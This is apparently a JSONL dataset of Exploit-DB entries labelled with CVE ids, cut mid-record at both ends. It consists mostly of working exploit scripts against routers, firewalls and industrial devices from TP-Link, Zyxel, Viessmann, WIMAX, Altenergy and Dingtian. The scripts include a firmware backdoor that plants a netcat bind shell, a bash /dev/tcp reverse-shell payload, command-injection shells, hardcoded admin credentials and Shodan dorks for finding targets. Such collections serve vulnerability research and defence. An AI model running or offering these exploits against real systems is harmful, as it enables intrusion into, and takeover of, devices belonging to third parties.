iv=aes_iv)\n\t\tplaintext_padded = pad(plaintext, aes_block_size)\n\t\treturn cipher.encrypt(plaintext_padded)\n\n\n\tdef aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):\n\t\tcipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)\n\t\tplaintext_padded = cipher.decrypt(ciphertext)\n\t\tplaintext = unpad(plaintext_padded, aes_block_size)\n\t\treturn plaintext\n\n\n\tdef rsa_encrypt(self, n, e, plaintext):\n\t\tpublic_key = RSA.construct((n, e)).publickey()\n\t\tencryptor = PKCS1_v1_5.new(public_key)\n\t\tblock_size = int(public_key.n.bit_length()/8) - 11\n\t\tencrypted_text = ''\n\t\tfor i in range(0, len(plaintext), block_size):\n\t\t\tencrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex()\n\t\treturn encrypted_text\n\n\n\tdef download_request(self, url, post_data):\n\t\tres = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True)\n\t\tfilepath = os.getcwd()+'/'+re.findall(r'(?<=filename=\")[^\"]+', res.headers['Content-Disposition'])[0]\n\t\tif os.path.exists(filepath):\n\t\t\tprint('[!] can\\'t download, file \"%s\" already exists' % filepath)\n\t\t\treturn\n\t\twith open(filepath, 'wb') as f:\n\t\t\tfor chunk in res.iter_content(chunk_size=4096):\n\t\t\t\tf.write(chunk)\n\t\treturn filepath\n\n\n\tdef basic_request(self, url, post_data, files_data={}):\n\t\tres = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data)\n\t\treturn json.loads(res.content)\n\n\n\tdef encrypted_request(self, url, post_data):\n\t\tserialized_data = urlencode(post_data)\n\t\tencrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8'))\n\t\tencrypted_data = base64.b64encode(encrypted_data)\n\n\t\tsignature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data))\n\t\tencrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature)\n\n\t\tres = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important\n\t\tif(res.status_code != 200):\n\t\t\tprint('[!] url \"%s\" returned unexpected status code'%(url))\n\t\t\treturn\n\t\tencrypted_data = json.loads(res.content)\n\t\tencrypted_data = base64.b64decode(encrypted_data['data'])\n\t\tdata = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data)\n\t\treturn json.loads(data)\n\n\n\tdef login(self):\n\t\tpost_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)}\n\t\tdata = self.encrypted_request('/login?form=login', post_data)\n\t\tif data['success'] != True:\n\t\t\tprint('[!] login failed')\n\t\t\treturn\n\t\tprint('[+] logged in, received token (stok): %s'%(data['data']['stok']))\n\t\treturn data['data']['stok']\n\n\n\nclass BackupParser(object):\n\n\tdef __init__(self, filepath):\n\t\tself.encrypted_path = os.path.abspath(filepath)\n\t\tself.decrypted_path = os.path.splitext(filepath)[0]\n\n\t\tself.aes_key = bytes.fro", "cve_id": "CVE-2022-30075", "source": "exploitdb", "timestamp": "2022-06-14T00:00:00+00:00"} {"id": "d76f2a456ab8e94337b1", "text": "TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)\n\n# !/usr/bin/python3\n\n# Exploit Title: TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)\n# Exploit Author: Tobias Müller\n# Date: 2022-12-01\n# Version: TL-WR902AC(EU)_V3_0.9.1 Build 220329\n# Vendor Homepage: https://www.tp-link.com/\n# Tested On: TP-Link TL-WR902AC\n# Vulnerability Description: Remote Code Execution via importing malicious firmware file\n# CVE: CVE-2022-48194\n# Technical Details: https://github.com/otsmr/internet-of-vulnerable-things\n\nTARGET_HOST = \"192.168.0.1\"\nADMIN_PASSWORD = \"admin\"\nTP_LINK_FIRMWARE_DOWNLOAD = \"https://static.tp-link.com/upload/firmware/2022/202208/20220803/TL-WR902AC(EU)_V3_220329.zip\"\n\n\nimport requests\nimport os\nimport glob\nimport subprocess\nimport base64, os, hashlib\nfrom Crypto.Cipher import AES, PKCS1_v1_5 # pip install pycryptodome\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Util.Padding import pad\n\n\n\nfor program in [\"binwalk\", \"fakeroot\", \"unsquashfs\", \"mksquashfs\"]:\n if \"not found\" in subprocess.check_output([\"which\", program]).decode():\n print(f\"[!] need {program} to run\")\n exit(1)\n\n\nclass WebClient(object):\n\n def __init__(self, host, password):\n\n self.host = \"http://\" + host\n self.password = password\n self.password_hash = hashlib.md5(('admin%s' % password.encode('utf-8')).encode('utf-8')).hexdigest()\n\n self.aes_key = \"7765636728821987\"\n self.aes_iv = \"8775677306058909\"\n\n self.session = requests.Session()\n\n crypto_data = self.cgi_basic(\"?8\", \"[/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0\\r\\n\").text\n\n self.sign_rsa_e = int(crypto_data.split(\"\\n\")[1].split('\"')[1], 16)\n self.sign_rsa_n = int(crypto_data.split(\"\\n\")[2].split('\"')[1], 16)\n self.seq = int(crypto_data.split(\"\\n\")[3].split('\"')[1])\n\n self.jsessionid = self.get_jsessionid()\n\n\n def get_jsessionid(self):\n post_data = f\"8\\r\\n[/cgi/login#0,0,0,0,0,0#0,0,0,0,0,0]0,2\\r\\nusername=admin\\r\\npassword={self.password}\\r\\n\"\n self.get_encrypted_request_data(post_data, True)\n return self.session.cookies[\"JSESSIONID\"]\n\n def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):\n cipher = AES.new(aes_key.encode('utf-8'), AES.MODE_CBC, iv=aes_iv.encode('utf-8'))\n plaintext_padded = pad(plaintext, aes_block_size)\n return cipher.encrypt(plaintext_padded)\n\n def rsa_encrypt(self, n, e, plaintext):\n public_key = RSA.construct((n, e)).publickey()\n encryptor = PKCS1_v1_5.new(public_key)\n block_size = int(public_key.n.bit_length() / 8) - 11\n encrypted_text = ''\n for i in range(0, len(plaintext), block_size):\n encrypted_text += encryptor.encrypt(plaintext[i:i + block_size]).hex()\n return encrypted_text\n\n def get_encrypted_request_data(self, post_data, is_login: bool):\n\n encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, post_data.encode('utf-8'))\n encrypted_data = base64.b64encode(encrypted_data).decode()\n\n self.seq += len(encrypted_data)\n signature = f\"h={self.password_hash}&s={self.seq}\"\n if is_login:\n signature = f\"key={self.aes_key}&iv={self.aes_iv}&\" + signature\n\n encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature.encode('utf-8'))\n\n body = f\"sign={encrypted_signature}\\r\\ndata={encrypted_data}\\r\\n\"\n\n return self.cgi_basic(\"_gdpr\", body)\n\n def cgi_basic(self, url: str, body: str):\n\n res = self.session.post(f\"{self.host}/cgi{url}\", data=body, headers={\n \"Referer\": \"http://192.168.0.1/\"\n })\n\n if res.status_code != 200:\n print(res.text)\n raise ValueError(\"router not reachable\")\n\n return res\n\n\ndef cmd(command):\n print(\"[*] running \" + command)\n os.system(command)\n\ndef build_backdoor():\n\n if os.path.isdir(\"./tp_tmp\"):\n cmd(\"rm -r -f ./tp_tmp\")\n\n os.mkdir(\"./tp_tmp\")\n os.chdir('./tp_tmp')\n\n print(\"[*] downloading firmware\")\n res = requests.get(TP_LINK_FIRMWARE_DOWNLOAD)\n with open(\"firmware.zip\", \"wb\") as f:\n f.write(res.content)\n\n print(\"[*] downloading netcat\")\n\n #res = requests.get(NETCAT_PRECOMPILED_FILE)\n #with open(\"netcat\", \"wb\") as f:\n # f.write(res.content)\n\n if os.path.isfile(\"netcat\"):\n print(\"[!] netcat not found\")\n exit()\n\n cmd('unzip firmware.zip')\n filename = glob.glob(\"TL-*.bin\")[0]\n cmd(f\"mv '{filename}' firmware.bin\")\n cmd('binwalk --dd=\".*\" firmware.bin')\n cmd('fakeroot -s f.dat unsquashfs -d squashfs-root _firmware.bin.extracted/160200')\n\n with open(\"./squashfs-root/etc/init.d/back\", \"w\") as f:\n f.write(\"\"\"\n#!/bin/sh\nwhile true;\ndo\n netcat -l -p 3030 -e /bin/sh\n sleep 5\ndone\n\"\"\")\n\n cmd(\"chmod +x ./squashfs-root/etc/init.d/back\")\n\n with open(\"./squashfs-root/etc/init.d/rcS\", \"r+\") as f:\n\n ", "cve_id": "CVE-2022-48194", "source": "exploitdb", "timestamp": "2023-04-01T00:00:00+00:00"} {"id": "4951b5b15dfcb1e4df85", "text": "Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE)\n\n#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)\n#- Shodan Dork: http.title:'Vitogate 300'\n#- Exploit Author: ByteHunter\n#- Email: 0xByteHunter@proton.me\n#- Version: versions up to 2.1.3.0\n#- Tested on: 2.1.1.0\n#- CVE : CVE-2023-5702 & CVE-2023-5222\n\n\nimport argparse\nimport requests\n\ndef banner():\n banner = \"\"\"\n ╔═══════════════════════════════════╗\n CVE-2023-5702\n Vitogate 300 RCE\n Author: ByteHunter\n ╚═══════════════════════════════════╝\n \"\"\"\n\n print(banner)\n\n\ndef send_post_request(target_ip, command, target_port):\n payload = {\n \"method\": \"put\",\n \"form\": \"form-4-7\",\n \"session\": \"\",\n \"params\": {\n \"ipaddr\": f\"1;{command}\"\n }\n }\n\n headers = {\n \"Host\": target_ip,\n \"Content-Length\": str(len(str(payload))),\n \"Content-Type\": \"application/json\"\n }\n\n url = f\"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi\"\n\n\n response = requests.post(url, json=payload, headers=headers)\n\n if response.status_code == 200:\n print(\"Result:\")\n print(response.text)\n else:\n print(f\"Request failed! status code: {response.status_code}\")\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Vitogate 300 RCE & Hardcoded Credentials\")\n parser.add_argument(\"--target\", required=False, help=\"Target IP address\")\n parser.add_argument(\"--port\", required=False, help=\"Target port\",default=\"80\")\n parser.add_argument(\"--command\", required=False, help=\"Command\")\n parser.add_argument(\"--creds\", action=\"store_true\", help=\"Show hardcoded credentials\")\n\n args = parser.parse_args()\n\n if args.creds:\n print(\"Vitogate 300 hardcoded administrative accounts credentials\")\n print(\"Username: vitomaster, Password: viessmann1917\")\n print(\"Username: vitogate, Password: viessmann\")\n else:\n target_ip = args.target\n target_port = args.port\n command = args.command\n\n if not (target_ip and command):\n print(\"Both --target and --command options are required.\\nor use --creds option to see hardcoded Credentials.\")\n return\n\n send_post_request(target_ip, command,target_port)\n\nif __name__ == \"__main__\":\n banner()\n main()", "cve_id": "CVE-2023-5702", "source": "exploitdb", "timestamp": "2024-03-14T00:00:00+00:00"} {"id": "4951b5b15dfcb1e4df85", "text": "Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE)\n\n#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)\n#- Shodan Dork: http.title:'Vitogate 300'\n#- Exploit Author: ByteHunter\n#- Email: 0xByteHunter@proton.me\n#- Version: versions up to 2.1.3.0\n#- Tested on: 2.1.1.0\n#- CVE : CVE-2023-5702 & CVE-2023-5222\n\n\nimport argparse\nimport requests\n\ndef banner():\n banner = \"\"\"\n ╔═══════════════════════════════════╗\n CVE-2023-5702\n Vitogate 300 RCE\n Author: ByteHunter\n ╚═══════════════════════════════════╝\n \"\"\"\n\n print(banner)\n\n\ndef send_post_request(target_ip, command, target_port):\n payload = {\n \"method\": \"put\",\n \"form\": \"form-4-7\",\n \"session\": \"\",\n \"params\": {\n \"ipaddr\": f\"1;{command}\"\n }\n }\n\n headers = {\n \"Host\": target_ip,\n \"Content-Length\": str(len(str(payload))),\n \"Content-Type\": \"application/json\"\n }\n\n url = f\"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi\"\n\n\n response = requests.post(url, json=payload, headers=headers)\n\n if response.status_code == 200:\n print(\"Result:\")\n print(response.text)\n else:\n print(f\"Request failed! status code: {response.status_code}\")\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Vitogate 300 RCE & Hardcoded Credentials\")\n parser.add_argument(\"--target\", required=False, help=\"Target IP address\")\n parser.add_argument(\"--port\", required=False, help=\"Target port\",default=\"80\")\n parser.add_argument(\"--command\", required=False, help=\"Command\")\n parser.add_argument(\"--creds\", action=\"store_true\", help=\"Show hardcoded credentials\")\n\n args = parser.parse_args()\n\n if args.creds:\n print(\"Vitogate 300 hardcoded administrative accounts credentials\")\n print(\"Username: vitomaster, Password: viessmann1917\")\n print(\"Username: vitogate, Password: viessmann\")\n else:\n target_ip = args.target\n target_port = args.port\n command = args.command\n\n if not (target_ip and command):\n print(\"Both --target and --command options are required.\\nor use --creds option to see hardcoded Credentials.\")\n return\n\n send_post_request(target_ip, command,target_port)\n\nif __name__ == \"__main__\":\n banner()\n main()", "cve_id": "CVE-2023-5222", "source": "exploitdb", "timestamp": "2024-03-14T00:00:00+00:00"} {"id": "8f9b6e03651810c50d41", "text": "WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE\n\n# Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE\n# Vulnerability Name: Ballin' Mada\n# Date: 4/3/2023\n# Exploit Author: Momen Eldawakhly (Cyber Guy)\n# Vendor Homepage: http://www.seowonintech.co.kr/eng/main\n# Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)\n# Tested on: Unix\n# CVE : Under registration\n\nimport requests\nimport random,argparse\nimport sys\nfrom colorama import Fore\nfrom bs4 import BeautifulSoup\n\nred = Fore.RED\ngreen = Fore.GREEN\ncyan = Fore.CYAN\nyellow = Fore.YELLOW\nreset = Fore.RESET\n\nargParser = argparse.ArgumentParser()\nargParser.add_argument(\"-t\", \"--target\", help=\"Target router\")\nargParser.add_argument(\"-rv\", \"--reverseShell\", help=\"Obtain reverse shell\", action='store_true')\nargParser.add_argument(\"-tx\", \"--testExploit\", help=\"Test exploitability\", action='store_true')\n\nargs = argParser.parse_args()\ntarget = args.target\nrev = args.reverseShell\ntestX = args.testExploit\n\n\nbanner = \"\"\"\n ____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____\n||B |||a |||l |||l |||i |||n |||' ||| |||M |||a |||d |||a ||\n||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__||\n|/__\\|/__\\|/__\\|/__\\|/__\\|/__\\|/__\\|/_______\\|/__\\|/__\\|/__\\|/__\\|\n RCE 0day in WIMAX SWC-5100W\n [ Spell the CGI as in Cyber Guy ]\n\"\"\"\ndef checkEXP():\n print(cyan + \"[+] Checking if target is vulnerable\" + reset)\n art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY']\n request = requests.get(url = f\"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo 'PUTS(\"+random.choice(art)+\")';\", proxies=None)\n if request.status_code == 200:\n print(green + \"[+] Status code: 200 success\" + reset)\n soup = BeautifulSoup(request.text, 'html.parser')\n if soup.get_text(\" \").find(\"PWNED_1EE7\") < 0 or soup.get_text(\" \").find(\"CGI AS IN CYBER GUY\"):\n print(green + \"[+] Target is vulnerable\" + reset)\n uname = requests.get(url = f\"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\\\"[*] Kernel: `uname+-a` -=-=- [*] Current directory: `pwd` -=-=- [*] User: `whoami`
\\\";\")\n soup_validate = BeautifulSoup(uname.text, 'html.parser')\n print(soup_validate.find(id=\"pwned\").text)\n else:\n print(red + \"[+] Seems to be not vulnerable\" + reset)\n else:\n print(red + \"[+] Status code: \" + str(request.status_code) + reset)\n\n\ndef revShell():\n cmd = input(\"CGI #:- \")\n while cmd:\n try:\n print(cmd)\n uname = requests.get(url = f\"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\\\"`{cmd}`\\\";\")\n resp = BeautifulSoup(uname.text, 'html.parser')\n print(resp.find(id=\"result\").text)\n if cmd == \"exit\" or cmd == \"quit\":\n print(yellow + \"[*] Terminating ...\" + reset)\n sys.exit(0)\n else:\n return revShell()\n except KeyboardInterrupt:\n sys.exit(0)\n\ndef help():\n print(\n \"\"\"\n[+] Example: python3 pwnMada.py -t 192.168.1.1 -rv\n\n[*] -t, --target :: Specify target to attack.\n[*] -rv, --reverseShell :: Obtain reverse shell.\n[*] -tx, --testExploit :: Test the exploitability of the target.\n[*] -fz, --fuzz :: Fuzz the target with arbitrary chars.\n \"\"\"\n )\n\nif target and rev:\n print(banner)\n revShell()\nelif target and testX:\n print(banner)\n checkEXP()\nelse:\n print(banner)\n argParser.print_help()", "cve_id": "CVE-2023-27826", "source": "exploitdb", "timestamp": "2023-04-06T00:00:00+00:00"} {"id": "44966355c4bf6ee4aae5", "text": "Zyxel USG FLEX 5.21 - OS Command Injection\n\n# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection\n# Shodan Dork: title:\"USG FLEX 100\" title:\"USG FLEX 100W\" title:\"USG FLEX 200\" title:\"USG FLEX 500\" title:\"USG FLEX 700\" title:\"USG20-VPN\" title:\"USG20W-VPN\" title:\"ATP 100\" title:\"ATP 200\" title:\"ATP 500\" title:\"ATP 700\" title:\"ATP 800\"\n# Date: May 18th 2022\n# Exploit Author: Valentin Lobstein\n# Vendor Homepage: https://www.zyxel.com\n# Version: ZLD5.00 thru ZLD5.21\n# Tested on: Linux\n# CVE: CVE-2022-30525\n\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nimport sys\nimport json\nimport base64\nimport requests\nimport argparse\n\n\nparser = argparse.ArgumentParser(\n prog=\"CVE-2022-30525.py\",\n description=\"Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444\",\n)\nparser.add_argument(\"-u\", dest=\"url\", help=\"Specify target URL\")\nparser.add_argument(\"-r\", dest=\"host\", help=\"Specify Remote host\")\nparser.add_argument(\"-p\", dest=\"port\", help=\"Specify Remote port\")\n\nargs = parser.parse_args()\n\nbanner = (\n \"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7\"\n \"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg\"\n \"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg\"\n \"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8\"\n \"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg\"\n \"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n\"\n \"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp\"\n \"biA6KSApCg==\"\n)\n\n\ndef main():\n\n print(\"\\n\" + base64.b64decode(banner).decode(\"utf-8\"))\n\n if None in vars(args).values():\n print(f\"[!] Please enter all parameters !\")\n parser.print_help()\n sys.exit()\n\n if \"http\" not in args.url:\n args.url = \"https://\" + args.url\n args.url += \"/ztp/cgi-bin/handler\"\n exploit(args.url, args.host, args.port)\n\n\ndef exploit(url, host, port):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0\",\n \"Content-Type\": \"application/json\",\n }\n\n data = {\n \"command\": \"setWanPortSt\",\n \"proto\": \"dhcp\",\n \"port\": \"4\",\n \"vlan_tagged\": \"1\",\n \"vlanid\": \"5\",\n \"mtu\": f'; bash -c \"exec bash -i &>/dev/tcp/{host}/{port}<&1;\";',\n \"data\": \"hi\",\n }\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n print(f\"\\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}\")\n\n try:\n response = requests.post(\n url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5\n )\n except (KeyboardInterrupt, requests.exceptions.Timeout):\n print(\"[!] Bye Bye hekcer !\")\n sys.exit(1)\n finally:\n\n try:\n print(\"[!] Can't exploit the target ! Code :\", response.status_code)\n\n except:\n print(\"[!] Enjoy your shell !!!\")\n\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2022-30525", "source": "exploitdb", "timestamp": "2022-06-03T00:00:00+00:00"} {"id": "277ee8c5cf43a00d951f", "text": "ABB FlowX v4.00 - Exposure of Sensitive Information\n\n# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information\n# Date: 2023-03-31\n# Exploit Author: Paul Smith\n# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series\n# Version: ABB Flow-X all versions before V4.00\n# Tested on: Kali Linux\n# CVE: CVE-2023-1258\n\n\n#!/usr/bin/python\nimport sys\nimport re\nfrom bs4 import BeautifulSoup as BS\nimport lxml\nimport requests\n\n# Set the request parameter\nurl = sys.argv[1]\n\n\ndef dump_users():\n response = requests.get(url)\n\n # Check for HTTP codes other than 200\n if response.status_code != 200:\n \tprint('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text)\n \texit()\n\n # Decode the xml response into dictionary and use the data\n data = response.text\n soup = BS(data, features=\"xml\")\n logs = soup.find_all(\"log\")\n for log in logs:\n \ttest = re.search('User (.*?) logged in',str(log))\n \tif test:\n \t\tprint(test.group(0))\ndef main():\n\tdump_users()\n\n\nif __name__ == '__main__':\n \tmain()", "cve_id": "CVE-2023-1258", "source": "exploitdb", "timestamp": "2023-07-19T00:00:00+00:00"} {"id": "0916069b5487df85481a", "text": "Altenergy Power Control Software C1.2.5 - OS command injection\n\n# Exploit Title: Altenergy Power Control Software C1.2.5 - OS command injection\n# Google Dork: intitle:\"Altenergy Power Control Software\"\n# Date: 15/3/2023\n# Exploit Author: Ahmed Alroky\n# Vendor Homepage: https://apsystems.com/\n# Version: C1.2.5\n# Tested on: Windows 10\n# CVE : CVE-2023-28343\n\n\nimport requests\nimport argparse\n\ndef exploit(target,attacker,port):\n url = f'{target}/index.php/management/set_timezone'\n\n headers = {\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Origin': f'{target}',\n 'Referer': f'{target}/index.php/management/datetime',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Connection': 'close'\n }\n\n print(f\"Sending Request\")\n data = {\n 'timezone': f'`mknod /tmp/pipe p;/bin/sh 0/tmp/pipe`'\n }\n\n response = requests.post(url, headers=headers, data=data)\n # print(response.text)\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Parse target, attacker,\nand port.',)\n\n parser.add_argument('--target','-t', type=str, help='The target IP\naddress or hostname. example : http://192.168.254')\n parser.add_argument('--attacker','-a', type=str, help='The attacker IP\naddress or hostname.')\n parser.add_argument('--port', '-p',type=int, help='Listening port')\n\n args = parser.parse_args()\n try:\n exploit(args.target,args.attacker,args.port)\n except:\n parser.print_help()\n print(\"Exploit done\")", "cve_id": "CVE-2023-28343", "source": "exploitdb", "timestamp": "2023-04-08T00:00:00+00:00"} {"id": "4381de8eb1c51399c1f9", "text": "Creston Web Interface 1.0.0.2159 - Credential Disclosure\n\n# Exploit Title: Creston Web Interface 1.0.0.2159 - Credential Disclosure\n# Exploit Author: RedTeam Pentesting GmbH\n\nAdvisory: Credential Disclosure in Web Interface of Crestron Device\n\n\nWhen the administrative web interface of the Crestron HDMI switcher is\naccessed unauthenticated, user credentials are disclosed which are valid\nto authenticate to the web interface.\n\nDetails\n=======\n\nProduct: Crestron HD-MD4X2-4K-E\nAffected Versions: 1.0.0.2159\nFixed Versions: -\nVulnerability Type: Information Disclosure\nSecurity Risk: high\nVendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E\nVendor Status: decided not to fix\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009\nAdvisory Status: published\nCVE: CVE-2022-23178\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178\n\n\nIntroduction\n============\n\n\"Crestron sets the gold standard for network security by leveraging the\nmost advanced technologies including 802.1x authentication, AES\nencryption, Active Directory® credential management, JITC Certification,\nSSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to\nprovide network security at the product level.\"\n\n(from the vendor's homepage)\n\n\nMore Details\n============\n\nUpon visiting the device's web interface using a web browser, a login\nform is displayed requiring to enter username and password to\nauthenticate. The analysis of sent HTTP traffic revealed that in\naddition to the loading of the website, a few more HTTP requests are\nautomatically triggered. One of the associated responses contains a\nusername and a password which can be used to authenticate as the\naffected user.\n\n\nProof of Concept\n================\n\nRequesting the URL \"http://crestron.example.com/\" via a web browser\nresults in multiple HTTP requests being sent. Among others, the\nfollowing URL is requested:\n\n------------------------------------------------------------------------\nhttp://crestron.example.com/aj.html?a=devi&_=[...]\n------------------------------------------------------------------------\n\nThis request results in a response similar to the following:\n\n------------------------------------------------------------------------\nHTTP/1.0 200 OK\nCache-Control: no-cache\nContent-type: text/html\n\n{\n \"login_ur\": 0,\n \"front_val\": [\n 0,\n 1\n ],\n \"uname\": \"admin\",\n \"upassword\": \"password\"\n}\n------------------------------------------------------------------------\n\nThe values for the keys \"uname\" and \"upassword\" could be used to\nsuccessfully authenticate to the web interface as the affected user.\n\n\nWorkaround\n==========\n\nReachability over the network can be restricted for access to the web\ninterface, for example by using a firewall.\n\n\nFix\n===\n\nNo fix known.\n\n\nSecurity Risk\n=============\n\nAs user credentials are disclosed to visitors of the web interface they\ncan directly be used to authenticate to it. The access allows to modify\nthe device's input and output settings as well as to upload and install\nnew firmware. Due to ease of exploitation and gain of administrative\naccess this vulnerability poses a high risk.\n\n\nTimeline\n========\n\n2021-10-06 Vulnerability identified\n2021-11-15 Customer approved disclosure to vendor\n2021-12-08 Vendor notified\n2021-12-15 Vendor notified again\n2021-12-21 Vendor response received: \"The device in question doesn't support\n Crestron's security practices. We recommend the HD-MD-4KZ alternative.\"\n2021-12-22 Requested confirmation, that the vulnerability will not be addressed.\n2021-12-28 Vendor confirms that the vulnerability will not be corrected.\n2022-01-12 Advisory released\n\n\n\nRedTeam Pentesting GmbH\n=======================\n\nRedTeam Pentesting offers individual penetration tests performed by a\nteam of specialised IT-security experts. Hereby, security weaknesses in\ncompany networks or products are uncovered and can be fixed immediately.\n\nAs there are only few experts in this field, RedTeam Pentesting wants to\nshare its knowledge and enhance the public knowledge with research in\nsecurity-related areas. The results are made available as public\nsecurity advisories.\n\nMore information about RedTeam Pentesting can be found at:\nhttps://www.redteam-pentesting.de/\n\n\nWorking at RedTeam Pentesting\n=============================\n\nRedTeam Pentesting is looking for penetration testers to join our team\nin Aachen, Germany. If you are interested please visit:\nhttps://www.redteam-pentesting.de/jobs/\n\n\n--\nRedTeam Pentesting GmbH Tel.: +49 241 510081-0\nDennewartstr. 25-27 Fax : +49 241 510081-99\n52068 Aachen https://www.redteam-pentesting.de\nGermany Registergericht: Aachen HRB 14004\nGeschäftsführer: Patrick Hof, Jens Liebchen", "cve_id": "CVE-2022-23178", "source": "exploitdb", "timestamp": "2022-01-18T00:00:00+00:00"} {"id": "e0993dfc9c21af9853b2", "text": "Dingtian-DT-R002 3.1.276A - Authentication Bypass\n\n# Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass\n# Google Dork: NA\n# Date: 13th July 2022\n# Exploit Author: Victor Hanna (Trustwave SpiderLabs)\n# Author Github Page: https://9lyph.github.io/CVE-2022-29593/\n# Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html\n# Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download\n# Version: V3.1.276A\n# Tested on: MAC OSX\n# CVE : CVE-2022-29593#!/usr/local/bin/python3\n# Author: Victor Hanna (SpiderLabs)\n# DingTian DT-R002 2CH Smart Relay\n# CWE-294 - Authentication Bypass by Capture-replay\n\nimport requests\nimport re\nimport urllib.parse\nfrom colorama import init\nfrom colorama import Fore, Back, Style\nimport sys\nimport os\nimport time\n\nfrom urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\ndef banner():\n print (\"[+]********************************************************************************[+]\")\n print (\"| Author : Victor Hanna (9lyph)[\"+Fore.RED + \"SpiderLabs\" +Style.RESET_ALL+\"]\\t\\t\\t\\t\\t |\")\n print (\"| Description: DingTian DT-R002 2CH Smart Relay |\")\n print (\"| Usage : \"+sys.argv[0]+\" |\")\n print (\"[+]********************************************************************************[+]\")\n\ndef main():\n os.system('clear')\n banner()\n urlRelay1On = \"http://\"+host+\"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&\"\n urlRelay1Off = 